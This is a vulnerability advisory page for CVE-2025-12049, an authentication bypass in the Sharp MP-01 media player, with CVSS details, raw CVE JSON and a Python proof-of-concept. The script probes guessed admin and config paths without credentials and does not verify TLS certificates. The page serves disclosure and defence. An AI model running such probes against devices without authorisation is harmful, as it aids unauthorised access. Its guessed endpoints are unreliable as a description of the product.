Security Vulnerability Report
CVE-2025-12049 CVSS 9.8 CRITICAL

CVE-2025-12049

Published: 2025-12-22 05:16:19
Last Modified: 2026-01-15 20:01:13

Description

Missing Authentication for Critical Function vulnerability in Sharp Display Solutions Media Player MP-01 (all versions) allows an attacker to access the web interface of the affected product without authentication and change settings or perform other operations, and to deliver content from the authoring software to the affected product without authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sharp:mp-01_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:mp-01:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sharp Display Solutions Media Player MP-01 - all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
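# CVE-2025-12049 PoC - Sharp Media Player MP-01 Authentication Bypass
# No authentication required to access web interface
#
# Scope of this check: it only sends unauthenticated GET requests and reports
# which of them answer HTTP 200. It does not change settings or deliver
# content. A 200 on its own is not proof of the flaw (a login form also
# answers 200), so the output is an indication to verify by hand, not a
# verdict.
#
# The CVE record is tagged "unsupported-when-assigned", so a firmware fix may
# not be available; consult the vendor advisory for how to limit exposure of
# an affected device.
import sys

import requests

# Per-request timeout in seconds.
REQUEST_TIMEOUT = 10

# Strings looked for in the response body to decide whether the page that
# answered belongs to the product at all. They are loose matches, so they
# identify the device family at best, not the firmware or the flaw.
PRODUCT_MARKERS = ('Sharp', 'Media Player')


def check_vulnerability(target_url):
    """
    Check if the target Sharp Media Player MP-01 answers on its web
    interface without credentials (CVE-2025-12049, Missing Authentication
    for Critical Function).

    Args:
        target_url: Base URL of the device to check.

    Returns:
        True when the request returned HTTP 200 and the body contains one of
        PRODUCT_MARKERS; False in every other case, including request errors.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        # NOTE(review): verify=False disables TLS certificate validation, so
        # over HTTPS the answer is not authenticated as coming from the
        # intended device. requests also emits an InsecureRequestWarning.
        response = requests.get(
            target_url, headers=headers, timeout=REQUEST_TIMEOUT, verify=False
        )
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

    print(f"[*] Target: {target_url}")
    print(f"[*] Status Code: {response.status_code}")

    if response.status_code != 200:
        print("[*] Target may not be vulnerable or is not reachable")
        return False

    # requests follows redirects by default, so the 200 may belong to a page
    # the device redirected to (for example a login form). Surface that so
    # the result is not misread.
    if response.history:
        print(f"[*] Request was redirected to: {response.url}")

    print("[!] Web interface answered HTTP 200 without credentials")
    # len(response.content) is the byte count; len(response.text) would count
    # decoded characters instead.
    print(f"[*] Response length: {len(response.content)} bytes")

    if any(marker in response.text for marker in PRODUCT_MARKERS):
        print("[!] CONFIRMED: Sharp Media Player interface detected")
        return True

    print("[*] No Sharp / Media Player marker in the response; verify the device manually")
    return False


def exploit_settings_access(target_url):
    """
    Report which of a fixed list of paths answer HTTP 200 without
    authentication.

    The paths are generic guesses; nothing on the advisory page documents
    them as real endpoints of the product. A 200 therefore only shows that
    some page was served, not that settings were exposed.

    Args:
        target_url: Base URL of the device to check.
    """
    common_paths = [
        '/',
        '/settings',
        '/config',
        '/admin',
        '/api/settings',
        '/api/config',
        '/api/status',
    ]

    base_url = target_url.rstrip('/')
    for path in common_paths:
        url = base_url + path
        try:
            # NOTE(review): same verify=False caveat as in check_vulnerability.
            response = requests.get(url, timeout=REQUEST_TIMEOUT, verify=False)
        except requests.exceptions.RequestException as e:
            # Only request failures are skipped; a bare except here would also
            # swallow KeyboardInterrupt and hide programming errors.
            print(f"[!] Path: {path} - Error: {e}")
            continue

        print(f"[*] Path: {path} - Status: {response.status_code}")
        if response.status_code == 200:
            print(f"[!] Accessible: {url}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target-device/"  # Modify target IP/hostname

    print("=" * 60)
    print("CVE-2025-12049 PoC - Sharp Media Player MP-01")
    print("Missing Authentication for Critical Function")
    print("=" * 60)

    check_vulnerability(target)
    exploit_settings_access(target)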

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12049", "sourceIdentifier": "[email protected]", "published": "2025-12-22T05:16:19.120", "lastModified": "2026-01-15T20:01:12.760", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Missing Authentication for Critical Function vulnerability in Sharp Display Solutions Media Player MP-01 All Verisons allows a attacker may access to the web interface of the affected product without authentication and change settings or perform other operations, and deliver content from the authoring software to the affected product without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:mp-01_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "E22249A4-D150-44EE-97F0-0A4F5E68F808"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:mp-01:-:*:*:*:*:*:*:*", "matchCriteriaId": "2472FECF-DBA8-4DAD-A766-B5B31CAD9319"}]}]}], "references": [{"url": "https://sharp-displays.jp.sharp/global/support/info/MP01-CVE-2025-12049.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}